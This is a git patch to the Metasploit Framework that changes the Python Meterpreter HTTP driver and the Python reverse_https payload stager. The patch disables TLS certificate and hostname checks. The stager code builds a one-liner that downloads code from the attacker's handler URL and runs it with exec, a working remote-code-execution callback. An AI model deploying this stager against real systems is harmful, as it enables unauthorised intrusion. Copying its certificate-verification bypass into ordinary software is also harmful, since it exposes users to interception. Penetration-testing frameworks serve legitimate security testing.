From 10e8cefd6d4a0cd5e43164decda74624ad386151 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Wed, 25 Mar 2015 19:49:42 -0400 Subject: [PATCH] Pymet dont validate ssl certs for 2.7.9/3.4.3 --- data/meterpreter/meterpreter.py | 15 +++++++---- .../payloads/stagers/python/reverse_https.rb | 26 ++++++++++++++----- 2 files changed, 30 insertions(+), 11 deletions(-) diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index cb73e1bf45..871a33335e 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py @@ -393,12 +393,17 @@ class PythonMeterpreter(object): print(msg) def driver_init_http(self): + opener_args = [] + scheme = HTTP_CONNECTION_URL.split(':', 1)[0] + if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2,7,9)) or sys.version_info >= (3,4,3)): + import ssl + ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23) + ssl_ctx.check_hostname=False + ssl_ctx.verify_mode=ssl.CERT_NONE + opener_args.append(urllib.HTTPSHandler(0, ssl_ctx)) if HTTP_PROXY: - scheme = HTTP_CONNECTION_URL.split(':', 1)[0] - proxy_handler = urllib.ProxyHandler({scheme: HTTP_PROXY}) - opener = urllib.build_opener(proxy_handler) - else: - opener = urllib.build_opener() + opener_args.append(urllib.ProxyHandler({scheme: HTTP_PROXY})) + opener = urllib.build_opener(*opener_args) if HTTP_USER_AGENT: opener.addheaders = [('User-Agent', HTTP_USER_AGENT)] urllib.install_opener(opener) diff --git a/modules/payloads/stagers/python/reverse_https.rb b/modules/payloads/stagers/python/reverse_https.rb index 22f928f4b0..46ed021234 100644 --- a/modules/payloads/stagers/python/reverse_https.rb +++ b/modules/payloads/stagers/python/reverse_https.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_https' module Metasploit3 - CachedSize = 446 + CachedSize = 742 include Msf::Payload::Stager @@ -55,18 +55,32 @@ module Metasploit3 proxy_host = datastore['PayloadProxyHost'].to_s proxy_port = datastore['PayloadProxyPort'].to_i - cmd = "import sys\n" if proxy_host == '' - cmd << "o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener()\n" + urllib_fromlist = "['HTTPSHandler','build_opener']" else + urllib_fromlist = "['HTTPSHandler','ProxyHandler','build_opener']" + end + + cmd = "import sys\n" + cmd << "vi=sys.version_info\n" + cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[vi[0]],fromlist=#{urllib_fromlist})\n" + cmd << "hs=[]\n" + # Context added to HTTPSHandler in 2.7.9 and 3.4.3 + cmd << "if (vi[0]==2 and vi>=(2,7,9)) or vi>=(3,4,3):\n" + cmd << "\timport ssl\n" + cmd << "\tsc=ssl.SSLContext(ssl.PROTOCOL_SSLv23)\n" + cmd << "\tsc.check_hostname=False\n" + cmd << "\tsc.verify_mode=ssl.CERT_NONE\n" + cmd << "\ths.append(ul.HTTPSHandler(0,sc))\n" + + if proxy_host != '' proxy_url = Rex::Socket.is_ipv6?(proxy_host) ? "http://[#{proxy_host}]:#{proxy_port}" : "http://#{proxy_host}:#{proxy_port}" - - cmd << "ul=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['ProxyHandler','build_opener'])\n" - cmd << "o=ul.build_opener(ul.ProxyHandler({'https':'#{var_escape.call(proxy_url)}'}))\n" + cmd << "hs.append(ul.ProxyHandler({'https':'#{var_escape.call(proxy_url)}'}))\n" end + cmd << "o=ul.build_opener(*hs)\n" cmd << "o.addheaders=[('User-Agent','#{var_escape.call(datastore['MeterpreterUserAgent'])}')]\n" cmd << "exec(o.open('#{target_url}').read())\n"